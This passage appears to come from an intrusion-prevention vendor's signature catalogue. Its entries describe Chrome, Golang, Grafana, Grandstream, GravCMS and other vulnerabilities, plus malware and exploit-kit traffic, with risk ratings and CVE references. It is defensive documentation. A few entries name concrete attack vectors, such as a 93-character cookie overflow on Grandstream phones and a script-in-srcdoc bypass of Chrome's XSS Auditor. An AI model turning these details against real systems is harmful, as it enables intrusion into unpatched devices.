https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1804

BID-47965
http://www.securityfocus.com/bid/47965

Google-Chrome-Type-Confusion-CVE-2020-6418

About this vulnerability:

An attempt to exploit a vulnerability in Google Chrome detected

Risk:

High

First detected in:

sgpkg-ips-1407-5242

Last changed:

sgpkg-ips-1407-5242

Platform:

Generic

Software:

Chrome

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Google Chrome detected.

Situation:

File-Text_Google-Chrome-Type-Confusion-CVE-2020-6418

References:

CVE-2020-6418
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6418

Google-Chrome-Type-Confusion-CVE-2021-21224

About this vulnerability:

An attempt to exploit a vulnerability in Google Chrome detected

Risk:

High

First detected in:

sgpkg-ips-1407-5242

Last changed:

sgpkg-ips-1407-5242

Platform:

Generic

Software:

Chrome

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Google Chrome detected.

Situation:

File-Text_Google-Chrome-Type-Confusion-CVE-2021-21224

References:

CVE-2021-21224
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224

Google-Chrome-Type-Confusion-CVE-2021-30563

About this vulnerability:

An attempt to exploit a vulnerability in Google Chrome detected

Risk:

High

First detected in:

sgpkg-ips-1408-5242

Last changed:

sgpkg-ips-1408-5242

Platform:

Generic

Software:

Chrome

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Google Chrome detected.

Situation:

File-Text_Google-Chrome-Type-Confusion-CVE-2021-30563

References:

CVE-2021-30563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30563

Google-Chrome-Type-Confusion-CVE-2022-1096

About this vulnerability:

A vulnerability in Google Chrome

Risk:

High

First detected in:

sgpkg-ips-1795-5242

Last changed:

sgpkg-ips-1795-5242

Platform:

Generic

Software:

Chrome

Type:

Type Confusion

Description:

A type confusion vulnerability has been reported in the V8 component of Google Chrome versions prior to 99.0.4844.84.

Situation:

File-Text_Google-Chrome-Type-Confusion-CVE-2022-1096

References:

CVE-2022-1096
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1096

Google-Chrome-Type-Confusion-CVE-2022-4262

About this vulnerability:

A vulnerability in Google Chrome

Risk:

High

First detected in:

sgpkg-ips-1658-5242

Last changed:

sgpkg-ips-1658-5242

Platform:

Generic

Software:

Chrome

Type:

Malfunction

Description:

A type confusion vulnerability has been reported in the V8 component of Google Chrome versions prior to 108.0.5359.94.

Situation:

File-Text_Google-Chrome-Type-Confusion-CVE-2022-4262

References:

CVE-2022-4262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4262

Google-Chrome-Type-Confusion-CVE-2023-2033

About this vulnerability:

A vulnerability in Google Chrome

Risk:

High

First detected in:

sgpkg-ips-1665-5242

Last changed:

sgpkg-ips-1665-5242

Platform:

Generic

Software:

Chrome

Type:

Malfunction

Description:

A type confusion vulnerability has been reported in the V8 component of Google Chrome versions prior to 112.0.5615.121.

Situation:

File-Text_Google-Chrome-Type-Confusion-CVE-2023-2033

References:

CVE-2023-2033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2033

Google-Chrome-Uninitialized-BugReport-Pointer-Code-Execution

About this vulnerability:	A vulnerability in Google Google Chrome
Risk:	Moderate
First detected in:	sgpkg-ips-410-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Chrome
Type:	Malfunction
Description:	A code execution vulnerability has been reported in Google Chrome. The vulnerability is due to accessing an uninitialized memory during processing of URLs with rogue extensions. More specifically, it is due to an invalid write in the browser process when trying to delete an invalid bug_report_ pointer. An attacker can leverage this vulnerability by enticing a target user to open a crafted web file. Successful exploitation would allow an attacker to execute arbitrary code in the security context of the logged in user. An unsuccessful attack could cause an abnormal termination of the affected product.
Situation:	File-Binary_Google-Chrome-Uninitialized-BugReport-Pointer

Google-Chrome-Use-After-Free-CVE-2019-13720

About this vulnerability:

A vulnerability in Google Chrome

Risk:

High

First detected in:

sgpkg-ips-1658-5242

Last changed:

sgpkg-ips-1658-5242

Platform:

Generic

Software:

Chrome

Type:

Malfunction

Description:

A use after free vulnerability has been reported in Google Chrome's WebAudio component. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML document.

Situation:

File-Text_Google-Chrome-Use-After-Free-CVE-2019-13720

References:

CVE-2019-13720
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13720

Google-Chrome-Use-After-Free-CVE-2019-5869

About this vulnerability:

A vulnerability in Google Chrome

Risk:

High

First detected in:

sgpkg-ips-1205-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Chrome

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Google Chrome. Successful exploitation could lead in arbitrary code execution.

Situation:

File-Text_Google-Chrome-Use-After-Free-CVE-2019-5869

References:

CVE-2019-5869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5869

Google-Chrome-Use-After-Free-CVE-2020-6378

About this vulnerability:

A vulnerability in Google Chrome

Risk:

High

First detected in:

sgpkg-ips-1217-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Chrome

Type:

Use-after-free

Description:

There exists a Use-after-free vulnerability in the speech recognizer in Google Chrome.

Situation:

File-Text_Google-Chrome-Use-After-Free-CVE-2020-6378

References:

CVE-2020-6378
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6378

Google-Chrome-Use-After-Free-CVE-2021-37975

About this vulnerability:

An attempt to exploit a vulnerability in Google Chrome detected

Risk:

High

First detected in:

sgpkg-ips-1406-5242

Last changed:

sgpkg-ips-1406-5242

Platform:

Generic

Software:

Chrome

Type:

Use-after-free

Description:

A use-after-free vulnerability exists in Google Chrome. The vulnerability is due to a V8 garbage collector logic bug.

Situation:

File-Text_Google-Chrome-Use-After-Free-CVE-2021-37975

References:

CVE-2021-37975
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37975

Google-Chrome-Use-After-Free-CVE-2022-3038

About this vulnerability:

A vulnerability in Google Chrome

Risk:

High

First detected in:

sgpkg-ips-1596-5242

Last changed:

sgpkg-ips-1596-5242

Platform:

Generic

Software:

Chrome

Type:

Malfunction

Description:

A use after free vulnerability has been reported in Google Chrome versions prior to 105.0.5195.52. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page.

Situation:

File-Text_Google-Chrome-Use-After-Free-CVE-2022-3038

References:

CVE-2022-3038
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3038

Google-Chrome-Use-After-Free-CVE-2023-6112

About this vulnerability:

A vulnerability in Google Chrome

Risk:

High

First detected in:

sgpkg-ips-1781-5242

Last changed:

sgpkg-ips-1781-5242

Platform:

Generic

Software:

Chromium; Chrome; Microsoft Edge

Type:

Use-after-free

Description:

A use-after-free vulnerability exists in Navigation in Chromium based browsers such as Google Chrome and Microsoft Edge. A remote attacker could exploit the vulnerability by enticing the target user into opening a maliciously crafted web page.

Situation:

File-Text_Google-Chrome-Use-After-Free-CVE-2023-6112

References:

CVE-2023-6112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6112

Google-Chrome-V8-Crankshaft-Type-Confusion

About this vulnerability:

A vulnerability in Google Chrome

Risk:

Moderate

First detected in:

sgpkg-ips-990-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Chrome

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Google Chrome detected

Situation:

File-Text_Google-Chrome-V8-Crankshaft-Type-Confusion

References:

CVE-2017-5070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5070

Google-Chrome-V8-Engine-Jsstackcheck-Type-Confusion

About this vulnerability:

A vulnerability in Google V8 Javascript Engine

Risk:

High

First detected in:

sgpkg-ips-1695-5242

Last changed:

sgpkg-ips-1695-5242

Platform:

Generic

Software:

Chrome

Type:

Malfunction

Description:

A type confusion vulnerability has been reported in the V8 JavaScript engine of Google Chrome. The vulnerability is due to incorrect side effect modelling of JSStackCheck. A remote attacker could exploit this vulnerability by enticing a user into opening a crafted HTML page. Successful exploitation could result in execution of arbitrary code in the context of the Google Chrome sandbox.

Situation:

File-Text_Google-Chrome-V8-Engine-Jsstackcheck-Type-Confusion

References:

CVE-2023-3420
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3420

Google-Chrome-V8-Remote-Code-Execution-CVE-2020-16040

About this vulnerability:

A vulnerability in the component V8 of Google Chrome

Risk:

High

First detected in:

sgpkg-ips-1338-5242

Last changed:

sgpkg-ips-1338-5242

Platform:

Generic

Software:

<os>

Type:

Malfunction

Description:

There exists an insufficient data validation vulnerability in the component V8 of Google Chrome. Successful exploitation could lead in remote code execution.

Situation:

File-Text_Google-Chrome-V8-Remote-Code-Execution-CVE-2020-16040

References:

CVE-2020-16040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16040

Google-Chrome-V8-Type-Confusion-CVE-2021-30551

About this vulnerability:

An attempt to exploit a vulnerability in Chrome detected

Risk:

High

First detected in:

sgpkg-ips-1406-5242

Last changed:

sgpkg-ips-1406-5242

Platform:

Generic

Software:

Chrome

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in the component V8 of Google Chrome. A remote attacker could exploit this vulnerability by enticing a user to open a malicious web page.

Situation:

File-Text_Google-Chrome-V8-Type-Confusion-CVE-2021-30551

References:

CVE-2021-30551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30551

Google-Chrome-WebGL-2-Readpixels-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Google Chrome

Risk:

Moderate

First detected in:

sgpkg-ips-1023-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Chrome

Type:

Malfunction

Description:

There has been reported a heap buffer overflow vulnerability in the WebGL component of Google Chrome. This vulnerability could be exploited by a remote attacker by serving a user maliciously crafted webpage, which could lead to remote code execution.

Situation:

File-Text_Google-Chrome-WebGL-2-Readpixels-Heap-Buffer-Overflow

References:

CVE-2017-5112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5112

Google-Chrome-Xssauditor-Filter-Security-Policy-Bypass

About this vulnerability:

A vulnerability in Google Chrome

Risk:

Moderate

First detected in:

sgpkg-ips-564-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Chrome

Type:

Cross-site Scripting

Description:

A policy bypass vulnerability exists in Google Chrome. The vulnerability is due a design weakness in Chrome XSSAuditor. By inserting JavaScript in the srcdoc attribute of an IFRAME tag, the Cross-Site Scripting filter can be bypassed. An attacker can exploit this weakness to further facilitate exploiting known cross-site vulnerabilities.

Situation:

File-Text_Google-Chrome-Xssauditor-Filter-Security-Policy-Bypass

References:

OSVDB-102412
http://www.osvdb.org/102412

Google-Chrome-Xssauditor-Policy-Bypass

About this vulnerability:	A vulnerability in Google Chrome
Risk:	High
First detected in:	sgpkg-ips-658-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Chrome
Type:	Input Validation
Description:	A policy bypass vulnerability exists in Google Chrome. The vulnerability is due to improper handling of script tags within svg tags. A remote attacker can exploit this vulnerability by enticing a user to follow a crafted URL. Successful exploitation will result in bypassing the XSSAuditor feature.
Situation:	HTTP_CRL-Google-Chrome-Xssauditor-Policy-Bypass

Google-Document-Embedder-Plugin-File-Disclosure

About this vulnerability:

A Google Document Embedder Plugin File Disclosure vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-782-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Google Document Embedder

Type:

Directory Traversal

Description:

A vulnerability in Google Document Embedder plugin, versions before 2.5.4, which allows remote attackers to read arbitrary files via a directory traversal in the file parameter to libs/pdf.php.

Situation:

HTTP_CSU-Google-Document-Embedder-Plugin-File-Disclosure

References:

CVE-2012-4915
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4915

OSVDB-88891
http://www.osvdb.org/88891

Google-Golang-Crypto-Public-Key-Verify-Denial-Of-Service

About this vulnerability:

A vulnerability in Google Golang

Risk:

High

First detected in:

sgpkg-ips-1368-5242

Last changed:

sgpkg-ips-1368-5242

Platform:

Generic

Software:

Google Golang

Type:

Malfunction

Description:

A denial of service vulnerability has been reported in the Golang's crypto/ssh. This vulnerability is due to improper parsing of crafted public key in SSH messages, leading to the termination the SSH process. An attacker can exploit this vulnerability by sending a crafted SSH message to a Golang server that uses Go's built-in crypto module. Successful exploitation will cause the server to abnormally terminate.

Situation:

SSH_CS-Google-Golang-Crypto-Public-Key-Verify-Denial-Of-Service

References:

CVE-2020-9283
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9283

Google-Golang-Get-Command-Injection

About this vulnerability:

A vulnerability in Google Golang

Risk:

Moderate

First detected in:

sgpkg-ips-1048-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Google Golang

Type:

Input Validation

Description:

Insufficient sanitization of user input in the go get command causes a command injetction vulnerability in the golang client. A successful exploit allows arbitrary commands to be executed with the privileges of the client user.

Situation:

File-Text_Google-Golang-Get-Command-Injection

References:

CVE-2018-7187
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7187

Google-Golang-Get-Remote-Command-Execution

About this vulnerability:

A vulnerability in Google Golang

Risk:

Moderate

First detected in:

sgpkg-ips-1123-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Google Golang

Type:

Input Validation

Description:

There has been reported a command execution vulnerability in the golang client. This vulnerability can be exploited by a command "go get" to download and execute maliciously crafted Go package.

Situation:

File-Text_Google-Golang-Get-Remote-Command-Execution

References:

CVE-2018-16873
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16873

Google-Golang-HTTP2-CONTINUATION-Denial-Of-Service

About this vulnerability:

An attempt to exploit a vulnerability in Google Golang detected

Risk:

High

First detected in:

sgpkg-ips-1753-5242

Last changed:

sgpkg-ips-1753-5242

Platform:

Windows; Linux; Unix; Mac OS

Software:

Google Golang

Type:

Insecure Configuration

Description:

A vulnerability in Google's Golang Go HTTP2 implementation, verions before v0.23.0, which allows remote attackers to cause a denial of service condition on a target server by sending crafted requests, due to improper handling of CONTINUATION frames by the server.

Situation:

HTTP2_FRAME_HEADER-Google-Golang-HTTP2-CONTINUATION-Denial-Of-Service

References:

CVE-2023-45288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45288

Google-Picasa-CR2-TIFF-Stripbytecounts-Integer-Overflow

About this vulnerability:

A vulnerability in Google Picasa

Risk:

Moderate

First detected in:

sgpkg-ips-560-5211

Last changed:

sgpkg-ips-1412-5242

Platform:

Generic

Software:

Google Picasa

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists in Google Picasa. The vulnerability is due to a failure to validate StripByteCounts value when processing CR2 TIFF files. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted CR2 image file with a vulnerable version of the application. Successful exploitation could result in code execution in the context of the affected application.

References:

CVE-2013-5357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5357

OSVDB-101231
http://www.osvdb.org/101231

Google-Search-Appliance-Command-Execution

About this vulnerability:

A Google Search Appliance Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-744-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Google Search Appliance

Type:

Malfunction

Description:

A vulnerability in Google Search Appliance which allows remote attackers to obtain sensitive information and execute arbitrary code via Java class methods in system-property, sys:getProperty, and run:exec.

Situation:

File-Text_Google-Search-Appliance-Command-Execution

References:

CVE-2005-3757
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3757

BID-15509
http://www.securityfocus.com/bid/15509

OSVDB-20981
http://www.osvdb.org/20981

Google-Talk-Instant-Messaging-Network-Usage

About this vulnerability:	Google Talk instant messaging network usage
Risk:	Moderate
First detected in:	sgpkg-ips-94-1314
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Jabber Client; Generic browser
Type:	Instant Messenger
Description:	Usage of the Google Talk instant messaging network was detected.
Situation:	HTTP_CRL-Google-Talk-Instant-Messaging-Web-Interface-Usage Generic_Google-Talk-Instant-Messaging-Network-Usage

Gozi-Malware-Infection-Traffic

About this vulnerability:	Gozi malware infection traffic detected
Risk:	High
First detected in:	sgpkg-ips-1329-5242
Last changed:	sgpkg-ips-1410-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Gozi malware infection traffic was detected.
Situation:	HTTP_CS-Gozi-Malware-Infection-Traffic HTTP_CSU-Gozi-Malware-Infection-Traffic HTTP_CRL-Gozi-Malware-Infection-Traffic

Gozi-Prinimalka-Trojan

About this vulnerability:	Gozi Prinimalka Trojan
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Gozi Prinimalka is a Trojan. It is used to steal money from the victim.
Situation:	HTTP_CSU-Gozi-Prinimalka-Trojan-Activity-Detected

Grafana-HS-Pluginmarkdown-Directory-Traversal

About this vulnerability:

A vulnerability in Grafana Labs Grafana

Risk:

Moderate

First detected in:

sgpkg-ips-1428-5242

Last changed:

sgpkg-ips-1429-5242

Platform:

Generic

Software:

Grafana

Type:

Input Validation

Description:

Improper handling of fully lowercase or fully uppercase .md files causes a directory traversal vulnerability in Grafana. A successful exploit can allow an attacker to read the contents of arbitrary files. This vulnerability is due to an incomplete fix for CVE-2021-43798.

Situation:

HTTP_CSU-Grafana-HS-Pluginmarkdown-Directory-Traversal

References:

CVE-2021-43813
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43813

Grafana-Labs-Geomap-Attribution-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Grafana Labs Grafana

Risk:

Moderate

First detected in:

sgpkg-ips-1567-5242

Last changed:

sgpkg-ips-1567-5242

Platform:

Generic

Software:

Grafana

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported for Grafana Labs Grafana. This vulnerability is due to improper input validation for map attributes. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.

Situation:

File-Text_Grafana-Labs-Grafana-Geomap-Attribution-Stored-Cross-Site-Scripting

References:

CVE-2023-0507
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0507

Grafana-Labs-Grafana-CVE-2021-41174-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Grafana Labs Grafana

Risk:

Moderate

First detected in:

sgpkg-ips-1404-5242

Last changed:

sgpkg-ips-1404-5242

Platform:

Generic

Software:

Grafana

Type:

Input Validation

Description:

Insufficient validation of user input in the URI path causes a cross-site scripting vulnerability in Grafana. A successful attack allows an attacker to execute arbitrary scripts in an user's browser.

Situation:

HTTP_CRL-Grafana-Labs-Grafana-CVE-2021-41174-Cross-Site-Scripting

References:

CVE-2021-41174
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41174

Grafana-Labs-Grafana-Snapshot-Authentication-Bypass

About this vulnerability:

A vulnerability in Grafana Labs Grafana

Risk:

Moderate

First detected in:

sgpkg-ips-1439-5242

Last changed:

sgpkg-ips-1439-5242

Platform:

Generic

Software:

Grafana

Type:

Malfunction

Description:

Insufficient authorization on certain web endpoints causes an authentication bypass vulnerability in Grafana. A successful exploit allows an attacker to access and delete snapshots.

Situation:

HTTP_CSU-Grafana-Labs-Grafana-Snapshot-Authentication-Bypass

References:

CVE-2021-39226
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39226

Grafana-Local-File-Inclusion

About this vulnerability:

An attempt to exploit a vulnerability in Grafana detected

Risk:

High

First detected in:

sgpkg-ips-1411-5242

Last changed:

sgpkg-ips-1433-5242

Platform:

Generic

Software:

Grafana

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Grafana detected.

Situation:

HTTP_CSU-Grafana-Local-File-Inclusion

References:

CVE-2021-43798
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43798

Grafana-SQL-Expressions-Command-Injection-And-Local-File-Inclusion

About this vulnerability:

A vulnerability in Grafana

Risk:

Moderate

First detected in:

sgpkg-ips-1810-5242

Last changed:

sgpkg-ips-1810-5242

Platform:

Generic

Software:

Grafana

Type:

Input Validation

Description:

Improper validation of user input in an experimental feature called SQL Expressions causes a command injection vulnerability in Grafana. A successful exploitation allows an attacker to execute arbitrary commands and include local files on the target system.

Situation:

HTTP_CRL-Grafana-SQL-Expressions-Command-Injection-And-Local-File-Inclusion

References:

CVE-2024-9264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9264

Grafana-Unified-Alerting-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Grafana

Risk:

High

First detected in:

sgpkg-ips-1493-5242

Last changed:

sgpkg-ips-1493-5242

Platform:

Generic

Software:

Grafana

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability exists in Grafana. The vulnerability is due to insufficient validation of user input in the Unified Alerting feature of Grafana. A remote, authenticated, attacker could exploit this vulnerability by sending a crafted request to a vulnerable server. Successful exploitation could result in execution of script code in the security context of the target user's browser.

Situation:

HTTP_CRL-Grafana-Unified-Alerting-Stored-Cross-Site-Scripting

References:

CVE-2022-31097
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31097

GrandSoft-EK-Exploit-Redirect-Page

About this vulnerability:	GrandSoft Exploit Kit traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1059-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Javascript Injection
Description:	GrandSoft Exploit Kit traffic was detected. An exploit Kit is a platform, which can automatically exploit user's computer when infected website is visited.
Situation:	File-Text_GrandSoft-EK-Exploit-Redirect-Page

Grandstream-GXV-3000-SIP-Phone-Remote-Eavesdropping

About this vulnerability:

A vulnerability in Grandstream GXV-3000 SIP Phone

Risk:

High

First detected in:

sgpkg-ips-587-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Grandstream GXV-3000 SIP Phone

Type:

Malfunction

Description:

A vulnerability has been reported in Grandstream Networks' GXV3000 IP Video Phone that could be exploited by remote attackers to obtain potentially confidential information and cause a denial of service. The vulnerability is due to a design error in the handling of specially crafted messages. Remote attackers could exploit this vulnerability by sending a specially crafted sequence of two messages.

Situation:

SIP-TCP_Grandstream-GXV-3000-SIP-Phone-Remote-Eavesdropping
SIP-UDP_Grandstream-GXV-3000-SIP-Phone-Remote-Eavesdropping

References:

CVE-2007-4498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4498

BID-25399
http://www.securityfocus.com/bid/25399

OSVDB-40185
http://www.osvdb.org/40185

Grandstream-GXV31XX-Settimezone-Unauthenticated-Command-Execution

About this vulnerability:

A vulnerability in Grandstream GXV31XX IP multimedia phones.

Risk:

High

First detected in:

sgpkg-ips-1435-5242

Last changed:

sgpkg-ips-1495-5242

Platform:

Generic

Software:

Grandstream

Type:

Input Validation

Description:

A vulnerability in Grandstream GXV31XX IP multimedia phones, GXV3175v2 hardware V2.6A, firmware 1.0.1.19; and GXV3140 hardwareV0.4B, firmware 1.0.1.27, which allows remote attackers to bypass authentication via a buffer overflow in the phonecookie Cookie by sendinging 93 alphanumeric characters, and to execute arbitrary commands via the timezone parameter due to insufficient input validation.

Situation:

HTTP_CS-Grandstream-GXV31XX-Settimezone-Unauthenticated-Command-Execution

References:

CVE-2019-10655
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10655

Grandstream-UCM6200-SQL-Injection-CVE-2020-5722

About this vulnerability:

A vulnerability in Grandstream UCM6200

Risk:

High

First detected in:

sgpkg-ips-1326-5242

Last changed:

sgpkg-ips-1326-5242

Platform:

Generic

Software:

Grandstream

Type:

Input Validation

Description:

There exists a SQL injection vulnerability in the HTTP interface of the Grandstream UCM6200 series. This vulnerability may allow a remote, unauthenticated attacker to execute shell commands as root or inject arbitrary HTML into the password recovery emails.

Situation:

HTTP_CRL-Grandstream-UCM6200-SQL-Injection-CVE-2020-5722

References:

CVE-2020-5722
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5722

Grandstream-UCM62xx-IP-PBX-SendPasswordEmail-RCE

About this vulnerability:

A vulnerability in Grandstream UCM62xx IP PBX devices.

Risk:

High

First detected in:

sgpkg-ips-1435-5242

Last changed:

sgpkg-ips-1435-5242

Platform:

Generic

Software:

Grandstream

Type:

Input Validation

Description:

A vulnerability in Grandstream UCM62xx IP PBX devices, versions before firmware version 1.0.19.20, which allows remote attackers to execute SQL and system commands via the Forgot Password function.

Situation:

HTTP_CS-Grandstream-UCM62xx-IP-PBX-SendPasswordEmail-RCE

References:

CVE-2020-5722
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5722

Graphite-Web-Unsafe-Pickle-Handling-Vulnerability

About this vulnerability:

Graphite Web Unsafe Pickle Handling Vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-570-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Graphite

Type:

Code Injection

Description:

There is an arbitrary code execution vulnerability in Graphite real time graphing system web-module "pickle" library calls.

Situation:

HTTP_CRL-Graphite-Web-Unsafe-Pickle-Handling-Vulnerability

References:

CVE-2013-5093
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5093

BID-61894
http://www.securityfocus.com/bid/61894

OSVDB-96436
http://www.osvdb.org/96436

Grav-CMS-Page-Media-Upload-Directory-Traversal

About this vulnerability:

A vulnerability in Grav Grav CMS

Risk:

Moderate

First detected in:

sgpkg-ips-1716-5242

Last changed:

sgpkg-ips-1716-5242

Platform:

Generic

Software:

Grav CMS

Type:

Input Validation

Description:

Improper validation of page media upload requests causes a directory traversal vulnerability in the Grav CMS. A successful exploit allows an attacker to upload files to arbitrary locations on the target system, possibly gaining the ability to execute arbitrary code thereon.

Situation:

HTTP_CS-Grav-CMS-Page-Media-Upload-Directory-Traversal

References:

CVE-2024-27921
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27921

GravCMS-Remote-Command-Execution

About this vulnerability:

A vulnerability in GravCMS.

Risk:

High

First detected in:

sgpkg-ips-1365-5242

Last changed:

sgpkg-ips-1365-5242

Platform:

Generic

Software:

GravCMS

Type:

Input Validation

Description:

A vulnerability in GravCMS, versions 1.10.7 and before, which allows remote attackers to execute arbitrary terminal commands by allowing the chances to existing YAML files on the system, due to insufficient input validation.

Situation:

HTTP_CRL-GravCMS-Remote-Command-Execution

References:

CVE-2021-21425
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21425

Graylog-Open-Cluster-Configuration-Insecure-Deserialization

About this vulnerability:

An attempt to exploit a vulnerability in Graylog Open detected.

Risk:

High

First detected in:

sgpkg-ips-1697-5242

Last changed:

sgpkg-ips-1702-5242

Platform:

Generic

Software:

Graylog Open

Type:

Input Validation

Description:

A vulnerability in Graylog Open, versions 5.2.x prior to 5.2.4 and prior to 5.1.11, which can result in information disclosure due to incorrect user input validation when processing cluster configuration updates.

Situation:

HTTP_CSU-Graylog-Open-Cluster-Configuration-Insecure-Deserialization

References:

CVE-2024-24824
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24824

Green-Dam-Youth-Escort-Long-URI-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in Green Dam Youth Escort

Risk:

High

First detected in:

sgpkg-ips-262-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Green Dam Youth Escort

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Green Dam Youth Escort. The vulnerability is due to a lack of input validation when handling a specially crafted URI. A remote attacker can exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation allows arbitrary code injection and execution with the privileges of the currently logged in user.

Situation:

HTTP_SS-Green-Dam-Youth-Escort-Long-URI-Handling-Buffer-Overflow
File-Text_Green-Dam-Youth-Escort-Long-URI-Handling-Buffer-Overflow

References:

OSVDB-55126
http://www.osvdb.org/55126

Grendel-Scan-Vulnerability-Scanner-Usage

About this vulnerability:	Grendel-Scan vulnerability scanner usage detection
Risk:	Low
First detected in:	sgpkg-ips-269-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Grendel-Scan
Type:	Insecure Configuration
Description:	Gredel-Scan is a web application vulnerability scanner that can be used to scan hosts for remotely exploitable vulnerabilities and weaknesses. While Grendel-Scan may be an useful tool for network administrators it can be used by attackers looking for vulnerable hosts to exploit.
Situation:	HTTP_CSH-Grendel-Scan-Vulnerability-Scanner-Usage

GrimResource-Remote-Code-Execution-Via-Windows-MSC-Files-CVE-2024-43572

About this vulnerability:

An attempt to exploit a vulnerability in Windows detected

Risk:

High

First detected in:

sgpkg-ips-1744-5242

Last changed:

sgpkg-ips-1787-5242

Platform:

Windows

Software:

Any Software

Type:

Input Validation

Description:

This fingerprint detects a new infection technique, called GrimResource, that leverages Windows MSC files. It allows attackers to gain full code execution in the context of mmc.exe after a user clicks on a specially crafted MSC file.

Situation:

File-Text_GrimResource-Remote-Code-Execution-Via-Windows-MSC-Files-CVE-2024-43572
File-TextId_GrimResource-Remote-Code-Execution-Via-Windows-MSC-Files-CVE-2024-43572

References:

CVE-2024-43572
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43572

ms24-oct
http://technet.microsoft.com/security/bulletin/ms24-oct

GroundWork-Monitor-Monarch-Scan-Ref

About this vulnerability:

A suspicious referer for GroundWork Monitor Monarch Scan component

Risk:

Moderate

First detected in:

sgpkg-ips-536-5211

Last changed:

